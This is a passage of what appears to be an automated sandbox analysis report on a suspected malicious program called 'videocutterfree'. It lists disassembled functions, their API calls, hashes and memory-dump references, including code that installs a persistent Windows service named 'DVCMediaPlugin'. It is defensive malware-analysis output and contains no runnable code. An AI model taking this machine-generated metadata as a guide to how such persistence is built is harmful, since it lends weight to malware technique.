                                                                              • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                              APIs
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                              • sqlite3_step.SQLITE3 ref: 6094B496
                                                                              • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                              • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                              • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                              • String ID:
                                                                              • API String ID: 4082478743-0
                                                                              • Opcode ID: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                              • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                              • Opcode Fuzzy Hash: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                              • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                              APIs
                                                                                • Part of subcall function 00998888: __EH_prolog.LIBCMT ref: 0099888D
                                                                                • Part of subcall function 00998888: _Allocate.LIBCPMT ref: 009988E4
                                                                                • Part of subcall function 00998888: _memmove.LIBCMT ref: 0099893B
                                                                              • _memset.LIBCMT ref: 0099F6E9
                                                                              • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 0099F752
                                                                              • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 0099F75A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                              • String ID: Unknown error$invalid string position
                                                                              • API String ID: 1854462395-1837348584
                                                                              • Opcode ID: 8c4fad382a756feda71c070a2b24ba1e29bf66dde75075ee6f9be31af22abada
                                                                              • Instruction ID: 5912770e503c6099950c68044bb9aa7825018680d68c664122cb8be1fc972380
                                                                              • Opcode Fuzzy Hash: 8c4fad382a756feda71c070a2b24ba1e29bf66dde75075ee6f9be31af22abada
                                                                              • Instruction Fuzzy Hash: 4F51CF70208341DFEB14CF69C8A0B2FFBE8AB98314F50092DF49297692D775E5488B52
                                                                              APIs
                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                              • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                              • String ID: BINARY$INTEGER
                                                                              • API String ID: 317512412-1676293250
                                                                              • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                              • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                              • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                              • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                              APIs
                                                                              • CreateServiceA.ADVAPI32 ref: 0040B643
                                                                              • CloseServiceHandle.ADVAPI32(?), ref: 0040B952
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Service$CloseCreateHandle
                                                                              • String ID: -Nam$e "r
                                                                              • API String ID: 1873643653-692479093
                                                                              • Opcode ID: d3f062cb32ac252a8ebc4f4ec46022491c02ed61f87c3651dea6ea54d4f85491
                                                                              • Instruction ID: e5dcbfbb9d01b74dd34961d066d225f37407cbf7a64506b546a928ea32d61859
                                                                              • Opcode Fuzzy Hash: d3f062cb32ac252a8ebc4f4ec46022491c02ed61f87c3651dea6ea54d4f85491
                                                                              • Instruction Fuzzy Hash: 77E06DB294C641DBC6206F205E189663B74E56430472189B7D143BA9E1C3BD5907BAAF
                                                                              APIs
                                                                                • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                              • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                              • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                              • sqlite3_step.SQLITE3 ref: 6096A435
                                                                              • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                              • String ID:
                                                                              • API String ID: 247099642-0
                                                                              • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                              • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                              • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                              • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                              APIs
                                                                                • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                              • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                              • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                              • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                              • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                              • String ID:
                                                                              • API String ID: 326482775-0
                                                                              • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                              • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                              • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                              • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                              APIs
                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                              • String ID:
                                                                              • API String ID: 1477753154-0
                                                                              • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                              • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                              • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                              • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,009A3C46,?,?,?,00000001), ref: 009A82DD
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009A82E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 4a202cbaf103b326b25fcb7e0d9d06588ee6c0a0574198e856f844ca17671dc3
                                                                              • Instruction ID: cfe8e739109b9565677a331106c54f3db8ea542d1d67b0caa124810d67fee0f0
                                                                              • Opcode Fuzzy Hash: 4a202cbaf103b326b25fcb7e0d9d06588ee6c0a0574198e856f844ca17671dc3
                                                                              • Instruction Fuzzy Hash: C3B09231058218EBCB003B93ED09B483F2CEB046A2F008210FA0E44060CB66B520AAA1
                                                                              APIs
                                                                                • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                              • String ID:
                                                                              • API String ID: 1465156292-0
                                                                              • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                              • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                              • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                              • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                              APIs
                                                                              • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00402520
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: CtrlDispatcherServiceStart
                                                                              • String ID:
                                                                              • API String ID: 3789849863-0
                                                                              • Opcode ID: 8f602a7d9dac336a32a671e74333a399b7532ca36335f96a3cce3c9eb86660ed
                                                                              • Instruction ID: bddd98400be65f304706ea0ea433e1a6d6779133f20c9a967c657853cc3ddc09
                                                                              • Opcode Fuzzy Hash: 8f602a7d9dac336a32a671e74333a399b7532ca36335f96a3cce3c9eb86660ed
                                                                              • Instruction Fuzzy Hash: 569002202445019AE2045A615A0C3152554660464571144795403E10A0D67480119519
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 009924E6
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 009924FC
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0099250E
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0099256D
                                                                              • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 0099257F
                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 00992599
                                                                              • GetLastError.KERNEL32(?,7591DFB0), ref: 009925A2
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009925F0
                                                                              • InterlockedDecrement.KERNEL32(00000002), ref: 0099262F
                                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 0099268E
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00992699
                                                                              • InterlockedExchange.KERNEL32(00000000,00000001), ref: 009926AD
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 009926BD
                                                                              • GetLastError.KERNEL32(?,7591DFB0), ref: 009926C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                              • String ID:
                                                                              • API String ID: 1213838671-0
                                                                              • Opcode ID: c2109e7d33e28f7c1fe34e77b14ad3c53f656c6a3c09e8617c40cdb63cc5dffe
                                                                              • Instruction ID: 9a18caebb8c8252386cbe79c1d68be837bc851f1e2d53b1b54341a30c38c99ae
                                                                              • Opcode Fuzzy Hash: c2109e7d33e28f7c1fe34e77b14ad3c53f656c6a3c09e8617c40cdb63cc5dffe
                                                                              • Instruction Fuzzy Hash: EF613D71914209EFCF10EFAAD989AEEBBB8FF48310F10452AF516E3650D734A944DB61
                                                                              APIs
                                                                              • RegisterServiceCtrlHandlerA.ADVAPI32(DVCMediaPlugin,0040235E), ref: 004023C1
                                                                              • SetServiceStatus.ADVAPI32(0040A0A8), ref: 00402420
                                                                              • GetLastError.KERNEL32 ref: 00402422
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                              • GetLastError.KERNEL32 ref: 00402450
                                                                              • SetServiceStatus.ADVAPI32(0040A0A8), ref: 00402480
                                                                              • CreateThread.KERNEL32(00000000,00000000,VWhtp@,00000000,00000000,00000000), ref: 0040248C
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                              • CloseHandle.KERNEL32 ref: 004024A1
                                                                              • SetServiceStatus.ADVAPI32(0040A0A8), ref: 004024CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                              • String ID: DVCMediaPlugin$VWhtp@
                                                                              • API String ID: 3346042915-746469874
                                                                              • Opcode ID: 93bf316d3a85d6ca2139e1b56ff93359b71c7079893bbd23f439cc3327fb7afe
                                                                              • Instruction ID: fd79f20b39a9db48ff5f654bf40f7e364dc9607cebc3aa9cc45a394a4ac7ac76
                                                                              • Opcode Fuzzy Hash: 93bf316d3a85d6ca2139e1b56ff93359b71c7079893bbd23f439cc3327fb7afe
                                                                              • Instruction Fuzzy Hash: 172104B0865348AFD2109F16EF48A17BFB9EB95755711413AE205B22B1C7BA0429CF2E
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00994608
                                                                                • Part of subcall function 009A28FC: _malloc.LIBCMT ref: 009A2914
                                                                              • htons.WS2_32(?), ref: 00994669
                                                                              • htonl.WS2_32(?), ref: 0099468C
                                                                              • htonl.WS2_32(00000000), ref: 00994693
                                                                              • htons.WS2_32(00000000), ref: 00994747
                                                                              • _sprintf.LIBCMT ref: 0099475D
                                                                                • Part of subcall function 0099773B: _memmove.LIBCMT ref: 0099775B
                                                                              • htons.WS2_32(?), ref: 009946B0
                                                                                • Part of subcall function 009984E6: __EH_prolog.LIBCMT ref: 009984EB
                                                                                • Part of subcall function 009984E6: RtlEnterCriticalSection.NTDLL(00000020), ref: 00998566
                                                                                • Part of subcall function 009984E6: RtlLeaveCriticalSection.NTDLL(00000020), ref: 00998584
                                                                                • Part of subcall function 00991BA7: __EH_prolog.LIBCMT ref: 00991BAC
                                                                                • Part of subcall function 00991BA7: RtlEnterCriticalSection.NTDLL ref: 00991BBC
                                                                                • Part of subcall function 00991BA7: RtlLeaveCriticalSection.NTDLL ref: 00991BEA
                                                                                • Part of subcall function 00991BA7: RtlEnterCriticalSection.NTDLL ref: 00991C13
                                                                                • Part of subcall function 00991BA7: RtlLeaveCriticalSection.NTDLL ref: 00991C56
                                                                                • Part of subcall function 0099CCA2: __EH_prolog.LIBCMT ref: 0099CCA7
                                                                              • htonl.WS2_32(?), ref: 0099497C
                                                                              • htonl.WS2_32(00000000), ref: 00994983
                                                                              • htonl.WS2_32(00000000), ref: 009949C8
                                                                              • htonl.WS2_32(00000000), ref: 009949CF
                                                                              • htons.WS2_32(?), ref: 009949EF
                                                                              • htons.WS2_32(?), ref: 009949F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                              • String ID:
                                                                              • API String ID: 1645262487-0
                                                                              • Opcode ID: 164792915a6527e207a6f39a8fb5abce68bdbaba6044c74b79b4dc236c6dec91
                                                                              • Instruction ID: 35de24dce359af7fdd79e872d93f75e07996e8c42c982ea66ba3cc40e28242c1
                                                                              • Opcode Fuzzy Hash: 164792915a6527e207a6f39a8fb5abce68bdbaba6044c74b79b4dc236c6dec91
                                                                              • Instruction Fuzzy Hash: 23026771C14219EFDF11DFE8C845BEEBBB8AF48304F10415AE505B7291EB746A49CBA1
                                                                              APIs
                                                                              • RtlDecodePointer.NTDLL(?), ref: 009A70EA
                                                                              • _free.LIBCMT ref: 009A7103
                                                                                • Part of subcall function 009A1D24: HeapFree.KERNEL32(00000000,00000000,?,009A4A82,00000000,00000104,75920A60), ref: 009A1D38
                                                                                • Part of subcall function 009A1D24: GetLastError.KERNEL32(00000000,?,009A4A82,00000000,00000104,75920A60), ref: 009A1D4A
                                                                              • _free.LIBCMT ref: 009A7116
                                                                              • _free.LIBCMT ref: 009A7134
                                                                              • _free.LIBCMT ref: 009A7146
                                                                              • _free.LIBCMT ref: 009A7157
                                                                              • _free.LIBCMT ref: 009A7162
                                                                              • _free.LIBCMT ref: 009A7186
                                                                              • RtlEncodePointer.NTDLL(00B19C48), ref: 009A718D
                                                                              • _free.LIBCMT ref: 009A71A2
                                                                              • _free.LIBCMT ref: 009A71B8
                                                                              • _free.LIBCMT ref: 009A71E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 3064303923-0
                                                                              • Opcode ID: aedeb2a45d8f2b674000b77454b0e2aae833d1b641c4fb2d6140f0a5a3d4fae8
                                                                              • Instruction ID: e554f0b17f3b93c02c1b7dca4e6b0f6d81fe13085321bf42459cae16593b8b85
                                                                              • Opcode Fuzzy Hash: aedeb2a45d8f2b674000b77454b0e2aae833d1b641c4fb2d6140f0a5a3d4fae8
                                                                              • Instruction Fuzzy Hash: 0D214132D1D6109FC761AF94FC46E55BBE9EB4672071A002AE818972A1C7346D85EBD0
                                                                              APIs
                                                                                • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                              • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                              • sqlite3_free.SQLITE3 ref: 609605EA
                                                                              • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                              • sqlite3_free.SQLITE3 ref: 60960618
                                                                              • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                              • String ID: offsets
                                                                              • API String ID: 463808202-2642679573
                                                                              • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                              • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                              • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                              • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                              APIs
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                              • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A3E4
                                                                              • sqlite3_value_bytes.SQLITE3 ref: 6091A416
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A424
                                                                              • sqlite3_value_bytes.SQLITE3 ref: 6091A43A
                                                                              • sqlite3_result_text.SQLITE3 ref: 6091A5A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
